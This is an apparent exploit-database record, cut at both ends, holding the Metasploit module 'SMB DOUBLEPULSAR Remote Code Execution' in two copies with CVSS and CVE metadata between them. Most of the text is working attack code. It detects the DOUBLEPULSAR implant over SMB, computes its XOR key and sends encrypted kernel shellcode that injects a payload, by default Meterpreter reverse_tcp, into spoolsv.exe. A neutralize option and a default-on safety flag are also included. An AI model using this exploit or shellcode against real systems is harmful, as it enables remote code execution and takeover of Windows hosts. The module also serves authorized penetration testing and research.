ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-14] #"}, "lastseen": "2021-10-14T08:19:40", "differentElements": ["sourceData"], "edition": 43}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "04dfa0f8e68270a3810c72abd850701e", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-14T22:25:08", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27802"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0147"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96707", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-14T22:25:08", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-14T22:25:08", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => 
MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
